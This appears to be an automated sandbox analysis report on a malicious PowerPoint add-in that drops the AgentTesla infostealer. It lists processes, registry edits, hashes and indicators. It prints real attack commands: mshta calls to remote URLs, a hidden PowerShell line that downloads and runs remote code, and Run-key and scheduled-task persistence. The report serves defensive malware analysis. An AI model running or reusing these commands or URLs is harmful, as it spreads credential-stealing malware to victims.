Analysis
-
max time kernel
120s -
max time network
140s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
18-10-2021 09:32
Static task
static1
Behavioral task
behavioral1
Sample
1.ppam
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
1.ppam
Resource
win10-en-20210920
General
-
Target
1.ppam
-
Size
11KB
-
MD5
e5a35f8c565ddea415804d4b05244e28
-
SHA1
47d030e20b324c3706d652b2a562a61547e14fbd
-
SHA256
22da4275847d5be9f1d21df99c3f51be09d31be7942940732d311b030c62eeb0
-
SHA512
022d032f791e30e19a4c82a4e17cacaf238618c0f635bb94e747d7769093da575b2577fe95174d7b747b29909232d69df1a7135d9e3db640de947ce9dc21ffdf
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 5040 3464 mshta.exe POWERPNT.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3776-324-0x00000000004376DE-mapping.dmp family_agenttesla behavioral2/memory/3308-391-0x00000000004376DE-mapping.dmp family_agenttesla -
Blocklisted process makes network request 15 IoCs
Processes:
mshta.exepowershell.exeflow pid process 34 5040 mshta.exe 37 5040 mshta.exe 39 5040 mshta.exe 42 5040 mshta.exe 46 5040 mshta.exe 47 5040 mshta.exe 49 5040 mshta.exe 52 5040 mshta.exe 54 5040 mshta.exe 57 5040 mshta.exe 59 5040 mshta.exe 60 5040 mshta.exe 61 5040 mshta.exe 63 5040 mshta.exe 66 4992 powershell.exe -
Drops file in Drivers directory 2 IoCs
Processes:
jsc.exeRegAsm.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts jsc.exe File opened for modification C:\Windows\system32\drivers\etc\hosts RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
RegAsm.exejsc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 jsc.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/1.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_05220f8387b44631845060f312ebff49.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_74714f123fd24f07b9b6e592dd9ec191.txt').GetResponse().GetResponseStream()).ReadToend());" mshta.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exedescription pid process target process PID 4992 set thread context of 3776 4992 powershell.exe jsc.exe PID 4992 set thread context of 3308 4992 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEmshta.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mshta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mshta.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
POWERPNT.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1508 taskkill.exe 4184 taskkill.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
POWERPNT.EXEpid process 3464 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
dw20.exepowershell.exejsc.exeRegAsm.exepid process 2224 dw20.exe 2224 dw20.exe 4992 powershell.exe 4992 powershell.exe 4992 powershell.exe 3776 jsc.exe 3776 jsc.exe 3308 RegAsm.exe 3308 RegAsm.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
RegAsm.exepid process 3308 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 1508 taskkill.exe Token: SeDebugPrivilege 4184 taskkill.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeDebugPrivilege 3776 jsc.exe Token: SeDebugPrivilege 3308 RegAsm.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
POWERPNT.EXEmshta.exejsc.exeRegAsm.exepid process 3464 POWERPNT.EXE 5040 mshta.exe 3776 jsc.exe 3308 RegAsm.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
POWERPNT.EXEmshta.exepowershell.execsc.exedescription pid process target process PID 3464 wrote to memory of 5040 3464 POWERPNT.EXE mshta.exe PID 3464 wrote to memory of 5040 3464 POWERPNT.EXE mshta.exe PID 5040 wrote to memory of 1508 5040 mshta.exe taskkill.exe PID 5040 wrote to memory of 1508 5040 mshta.exe taskkill.exe PID 5040 wrote to memory of 4184 5040 mshta.exe taskkill.exe PID 5040 wrote to memory of 4184 5040 mshta.exe taskkill.exe PID 5040 wrote to memory of 4992 5040 mshta.exe powershell.exe PID 5040 wrote to memory of 4992 5040 mshta.exe powershell.exe PID 5040 wrote to memory of 4132 5040 mshta.exe schtasks.exe PID 5040 wrote to memory of 4132 5040 mshta.exe schtasks.exe PID 5040 wrote to memory of 2224 5040 mshta.exe dw20.exe PID 5040 wrote to memory of 2224 5040 mshta.exe dw20.exe PID 4992 wrote to memory of 3776 4992 powershell.exe jsc.exe PID 4992 wrote to memory of 3776 4992 powershell.exe jsc.exe PID 4992 wrote to memory of 3776 4992 powershell.exe jsc.exe PID 4992 wrote to memory of 3776 4992 powershell.exe jsc.exe PID 4992 wrote to memory of 3776 4992 powershell.exe jsc.exe PID 4992 wrote to memory of 3776 4992 powershell.exe jsc.exe PID 4992 wrote to memory of 3776 4992 powershell.exe jsc.exe PID 4992 wrote to memory of 3776 4992 powershell.exe jsc.exe PID 4992 wrote to memory of 4548 4992 powershell.exe csc.exe PID 4992 wrote to memory of 4548 4992 powershell.exe csc.exe PID 4548 wrote to memory of 2796 4548 csc.exe cvtres.exe PID 4548 wrote to memory of 2796 4548 csc.exe cvtres.exe PID 4992 wrote to memory of 3308 4992 powershell.exe RegAsm.exe PID 4992 wrote to memory of 3308 4992 powershell.exe RegAsm.exe PID 4992 wrote to memory of 3308 4992 powershell.exe RegAsm.exe PID 4992 wrote to memory of 3308 4992 powershell.exe RegAsm.exe PID 4992 wrote to memory of 3308 4992 powershell.exe RegAsm.exe PID 4992 wrote to memory of 3308 4992 powershell.exe RegAsm.exe PID 4992 wrote to memory of 3308 4992 powershell.exe RegAsm.exe PID 4992 wrote to memory of 3308 4992 powershell.exe RegAsm.exe -
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\1.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://www.bitly.com/doaksodksueasdweu2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/1.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_05220f8387b44631845060f312ebff49.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_74714f123fd24f07b9b6e592dd9ec191.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF00.tmp" "c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\CSC48B99235E1A14025AC3F54BABEF723BC.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 26963⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RESF00.tmpMD5
f2a2d79cbf31e342efa391b1ce01baa2
SHA1d80642fbedcb6b1e8b5877c79575e31406795ec6
SHA25695c9fd54100fc250f824e21b18645e6c84a0a643529b7742d817315645e9fbfa
SHA5125943f701b07a8daf9798004ffe124bf514bfad00c678b5b7c124d2203f7228bf10ce9cd9ee9309f88b568f643b4c02665d58de5496e63506e6c3cd534a1fe6b4
-
C:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.dllMD5
004a2a30c28121d4cc0a26952edde51d
SHA17b23b07ae09ae5f7625c33025e50a4f507d8383d
SHA25605b757cb056ee8ba48b2f70ec08bca1c912b5816723faa977e14a49e7eaa69ff
SHA512d2773635fe8c42d016c4dbd178e305dc692e78e3487e73de56702bcb4e2489bf427f7a7775b9b68ef228706bbf4156636984b0f13aefa212459768869bdf0aff
-
C:\Windows\system32\drivers\etc\hostsMD5
5b2d17233558878a82ee464d04f58b59
SHA147ebffcad0b4c358df0d6a06ef335cb6aab0ab20
SHA2565b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
SHA512d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
-
\??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\CSC48B99235E1A14025AC3F54BABEF723BC.TMPMD5
d8c9afdbf35ccbf33eba86ef205f5bdb
SHA18bcac41ee1298bf9239fb9d8077709ad26558b37
SHA256e2ab03b4cd65ff8a75a34c1a84278c0bb185fa649ab0c990bfb14e182b3bd7f6
SHA51280b1339a542ec3d77e6734fb0b4d7d9363235e98e42ecd3c4d619cf08ac3a57039ac653a3ec7dcd3b902cabe6ef9210a0eabd729776e2d99ec07ce72cd13f222
-
\??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\kyc2wkm5\kyc2wkm5.cmdlineMD5
536be0aaebd71dca2fed0e3abee76943
SHA154752089231ec3daf436e42538f28987e43a213b
SHA256d6d0af0e7cce2bfe40ca6e7ddd95413f9efa9c152861bf513e34a34f51cd69d8
SHA512519b822398cb50b5b50041040dbc93d3488a1026c71dd4e9c6512faf71a85cfbe7f0771f55b383ef23a7d906b36783a79a8441cb106aaf7bdd4b952e4d382dac
-
memory/1508-291-0x0000000000000000-mapping.dmp
-
memory/2224-300-0x0000000000000000-mapping.dmp
-
memory/2796-385-0x0000000000000000-mapping.dmp
-
memory/3308-408-0x0000000004E51000-0x0000000004E52000-memory.dmpFilesize
4KB
-
memory/3308-397-0x0000000004E50000-0x0000000004E51000-memory.dmpFilesize
4KB
-
memory/3308-391-0x00000000004376DE-mapping.dmp
-
memory/3464-128-0x00007FFD757C0000-0x00007FFD757D0000-memory.dmpFilesize
64KB
-
memory/3464-119-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmpFilesize
64KB
-
memory/3464-116-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmpFilesize
64KB
-
memory/3464-117-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmpFilesize
64KB
-
memory/3464-118-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmpFilesize
64KB
-
memory/3464-121-0x000001EE71060000-0x000001EE71062000-memory.dmpFilesize
8KB
-
memory/3464-120-0x000001EE71060000-0x000001EE71062000-memory.dmpFilesize
8KB
-
memory/3464-122-0x000001EE71060000-0x000001EE71062000-memory.dmpFilesize
8KB
-
memory/3464-115-0x00007FFD783B0000-0x00007FFD783C0000-memory.dmpFilesize
64KB
-
memory/3464-129-0x00007FFD757C0000-0x00007FFD757D0000-memory.dmpFilesize
64KB
-
memory/3776-379-0x0000000005270000-0x0000000005271000-memory.dmpFilesize
4KB
-
memory/3776-324-0x00000000004376DE-mapping.dmp
-
memory/3776-406-0x0000000005271000-0x0000000005272000-memory.dmpFilesize
4KB
-
memory/4132-299-0x0000000000000000-mapping.dmp
-
memory/4184-292-0x0000000000000000-mapping.dmp
-
memory/4548-382-0x0000000000000000-mapping.dmp
-
memory/4992-321-0x0000027649716000-0x0000027649718000-memory.dmpFilesize
8KB
-
memory/4992-316-0x0000027649713000-0x0000027649715000-memory.dmpFilesize
8KB
-
memory/4992-315-0x0000027649710000-0x0000027649712000-memory.dmpFilesize
8KB
-
memory/4992-298-0x0000000000000000-mapping.dmp
-
memory/5040-264-0x0000000000000000-mapping.dmp